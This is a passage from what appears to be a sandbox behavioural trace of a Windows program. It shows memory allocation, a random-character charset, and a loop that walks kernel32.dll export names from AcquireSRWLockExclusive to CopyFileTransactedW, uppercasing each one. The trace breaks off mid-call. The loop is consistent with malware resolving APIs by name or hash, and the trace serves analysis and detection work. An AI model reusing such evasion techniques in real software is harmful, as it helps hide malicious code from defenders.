lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.316] CloseHandle (hObject=0x0) returned 0 [0086.316] CloseHandle (hObject=0x438) returned 1 [0086.317] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.317] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.317] GetTickCount () returned 0x114e080 [0086.317] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.317] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.317] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.318] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.318] lstrlenA (lpString="kernel32.dll") returned 12 [0086.318] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.318] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.318] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.318] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.318] lstrlenA (lpString="ADDATOMA") returned 8 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.318] lstrlenA (lpString="ADDATOMW") returned 8 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.318] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.318] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.318] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.318] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.318] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.319] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.319] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.319] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.319] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.319] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.319] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.319] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.319] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.319] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.319] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.319] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.319] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.319] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.319] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.319] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.319] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.319] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.319] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.319] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.319] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.320] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.320] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.320] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.320] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.320] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.320] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.320] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.320] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.320] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.320] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.320] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.320] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.320] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.320] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.320] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.320] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.320] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.320] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.320] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.321] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.321] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.321] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.321] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.321] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.321] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.321] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.321] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.321] lstrlenA (lpString="BEEP") returned 4 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.321] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.321] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.321] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.321] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.321] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.321] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.321] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.321] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.321] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.321] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.321] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.322] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.322] lstrlenA (lpString="CANCELIO") returned 8 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.322] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.322] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.322] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.322] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.322] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.322] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.322] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.322] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.322] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.322] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.322] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.322] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.322] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.322] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.322] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.322] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.322] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.323] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.323] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.323] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.323] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.323] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.323] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.323] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.323] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.323] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.323] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.323] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.323] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.323] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.323] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.324] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.324] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.324] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.324] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.324] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.324] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.324] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.324] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.324] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.324] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.324] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.324] lstrlenA (lpString="COPYFILEA") returned 9 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.324] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.324] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.324] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.324] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.324] lstrcpyA (in: lpString1=0x3f2cf70, 